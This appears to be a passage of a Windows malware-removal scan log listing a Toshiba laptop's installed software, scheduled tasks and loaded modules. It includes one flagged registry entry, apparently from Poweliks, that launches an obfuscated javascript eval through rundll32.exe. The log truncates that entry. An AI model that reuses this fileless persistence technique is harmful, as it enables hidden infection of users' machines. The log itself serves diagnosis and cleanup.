Canon Speed Dial Utility (HKLM\...\Speed Dial Utility) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Utilities Solution Menu (HKLM\...\CanonSolutionMenu) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0315.1050.17562 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0315.1050.17562 - ATI) Hidden
CCC Help Chinese Standard (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Czech (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Danish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Dutch (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help English (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Finnish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help French (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help German (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Greek (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Hungarian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Italian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Japanese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Korean (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Norwegian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Polish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Portuguese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Russian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Spanish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Swedish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Thai (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Turkish (Version: 2010.0315.1049.17562 - ATI) Hidden
ccc-core-static (Version: 2010.0315.1050.17562 - ATI) Hidden
ccc-utility (Version: 2010.0315.1050.17562 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.05 - Piriform)
Cisco EAP-FAST Module (HKLM\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Conexant Audio Driver For AMD HDMI Codec (HKLM\...\CNXT_AUDIO_HDA_HDMI) (Version: 4.98.26.0 - Conexant)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.119.0.61 - Conexant)
Corel WinDVD (HKLM\...\{5C1F18D2-F6B7-4242-B803-B5A78648185D}) (Version: 10.0.5.822 - Corel Inc.)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{132D27B8-C656-44BD-8C16-73C54EA8A85F}) (Version:  - Microsoft)
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.8.0.1003 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.01.01.1007 - Intel Corporation)
iTunes (HKLM\...\{881F5DE8-9367-4B81-A325-E91BBC6472F9}) (Version: 10.1.1.4 - Apple Inc.)
Java™ 6 Update 17 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
Junk Mail filter update (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LSI V92 MOH Application (HKLM\...\LTMOH) (Version:  - LSI Corporation)
Malwarebytes' Anti-Malware (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version:  - Malwarebytes Corporation)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft IntelliPoint 8.0 (HKLM\...\{00F93853-D9D3-4795-A89E-84CCBA0205C9}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2003 Web Components (HKLM\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Converter Pack (HKLM\...\{6EECB283-E65F-40EF-86D3-D51BF02A8D43}) (Version: 11.0.0.0 - Microsoft Corporation - Office Resource Kit Group)
Microsoft Office Excel MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office OneNote MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Small Business Connectivity Components (HKLM\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 4.5.0216.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.5.216.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2005 Express Edition (MSSMLBIZ) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Express Edition (SQLEXPRESS) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Tools Express Edition (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server Native Client (HKLM\...\{7670D32F-DAE6-4E49-8C8B-B3F08B5B1686}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{E7084B89-69E0-46B3-A118-8F99D06988CD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoScape (HKLM\...\PhotoScape) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
QuickTime (HKLM\...\{57752979-A1C9-4C02-856B-FBB27AC4E02C}) (Version: 7.69.80.9 - Apple Inc.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30111 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (Version:  - Microsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.8.1 - Synaptics Incorporated)
System Requirements Lab for Intel (HKLM\...\{CD41B576-4787-4D5C-95EE-24A4ABD89CD3}) (Version: 4.4.24.0 - Husdawg, LLC)
TeamViewer 6 (HKLM\...\TeamViewer 6) (Version: 6.0.17222 - TeamViewer GmbH)
TOSHIBA ConfigFree (HKLM\...\{607BE7BF-7C28-4ADB-A4A0-385962B901C3}) (Version: 8.0.28 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\InstallShield_{53536479-DFB0-47ED-9D10-43F3708C222D}) (Version: 1.2.10.0 - TOSHIBA Corporation)
TOSHIBA eco Utility (Version: 1.2.10.0 - TOSHIBA Corporation) Hidden
TOSHIBA Hardware Setup (HKLM\...\{8E9CEA3B-EBD1-439C-A01D-830CB39613C6}) (Version: 2.00.06 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.6 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (Version: 3.1.0.6 - TOSHIBA Corporation) Hidden
TOSHIBA Media Controller (HKLM\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.80.3 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version: 2.2.97 - LSI Corporation)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\{073B89C3-BA88-41B5-965F-B35A88EAE838}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.3.3 - TOSHIBA Corporation)
TOSHIBA Value Added Package (Version: 1.3.3 - TOSHIBA Corporation) Hidden
TOSHIBA Web Camera Application (HKLM\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2837600) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4ACD847E-547D-493F-9A86-F73EAE1B5174}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{3FCFD88F-4D13-4F38-8625-ABABEA7F61EA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Windows Live Call (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Mail (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Live Writer (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
07-09-2014 01:28:19 Windows 7 Service Pack 1
07-09-2014 11:17:53 Windows Update
08-09-2014 02:19:37 Windows Update
08-09-2014 11:25:59 Windows Update
09-09-2014 06:43:28 Installed Adblock Plus for IE (32-bit)
09-09-2014 06:56:14 Malwarebytes Anti-Rootkit Restore Point
09-09-2014 19:00:13 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 10:04 - 2009-06-11 05:39 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0600C6CD-339E-40E5-837D-772661A93D2E} - System32\Tasks\{47BE60EA-15BF-417B-8455-8082DD3AA6C9} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0B0DCD61-E65B-41BD-87A5-E3FF4E52896D} - System32\Tasks\{2E3D8B46-8C0C-4CE5-BD72-9EA8BF2819A4} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0E809153-173D-4501-9AA3-E3299B8E4EEB} - System32\Tasks\{6446B742-20A7-4A87-91FB-1DAF36B20FDE} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {131204F4-96CD-4DA3-BE7A-816280B2F3AB} - System32\Tasks\{88F08FA9-BE71-4A64-979B-251F068C947A} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {3655B183-5D27-422D-9FD5-CB1638615759} - System32\Tasks\{35038549-A0E9-41DD-B0FC-39A9B0A1194D} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {48A8BE75-28FC-45FC-A2E4-BFBF99AB848F} - System32\Tasks\{E274B4A1-AFB4-49EA-BF80-7ACE438DC09F} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {67B5FCE5-D76F-44AC-A382-B1B5E874D085} - System32\Tasks\{3B5FF27F-F004-4707-A208-EAF4518D4AC7} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {69ACD1BB-0C0D-4370-BBB9-8E8D07A61169} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {77F07B0E-D155-4273-A665-FD20F9C0B9B7} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2010-02-23] (TOSHIBA CORPORATION)
Task: {81532BAB-54D1-4201-941B-AF6D56C850A4} - System32\Tasks\{F810B7E8-5B48-4A60-BF3B-7EED4E944DA3} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {8987DC76-A8B3-49B2-A0BB-072667F6A7AE} - System32\Tasks\{0443CAD0-DB77-4C07-86A1-3FE551E42396} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {976A4408-8F64-4C97-B073-CD2D16E60C09} - \{08BD5BC0-2D8E-7335-9F1F-3215372B580F} No Task File <==== ATTENTION
Task: {9ECA6E1B-A776-4C9B-B04A-A87D8E24AFAB} - System32\Tasks\{DC76CA08-A16E-427C-ABBC-3E5C759C3EA6} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {A264B53A-C76E-4EF8-A314-785501361D1E} - System32\Tasks\{9D54E60D-393D-4FD2-96B6-96A73B3AF2D9} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {B714418F-4FFB-4571-BE0E-0838A402499C} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-04-27] (Adobe Systems Incorporated)
Task: {CE67E4A0-0B09-4CF4-8D12-2080226E2384} - System32\Tasks\{928F0CFC-9063-46E2-BD07-C6585B0230DC} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {E331DF70-0764-4282-9BBA-EEB4DE041C73} - System32\Tasks\{F687F45B-D1DB-4FA4-BD38-ED30604C0A48} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
 
==================== Loaded Modules (whitelisted) =============
 
2006-12-04 01:25 - 2006-12-04 01:25 - 00022723 _____ () C:\windows\System32\sugs2l3.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 08783160 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-04 04:26 - 2009-11-04 04:26 - 00058680 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2009-03-13 10:08 - 2009-03-13 10:08 - 00049152 _____ () C:\Program Files\Toshiba\PCDiag\NotifyPCD.dll
2009-07-26 02:07 - 2009-07-26 02:07 - 00058704 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2010-11-17 13:16 - 2010-11-17 13:16 - 00067872 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2009-10-14 01:00 - 2009-10-14 01:00 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-11-03 08:46 - 2010-11-03 08:46 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
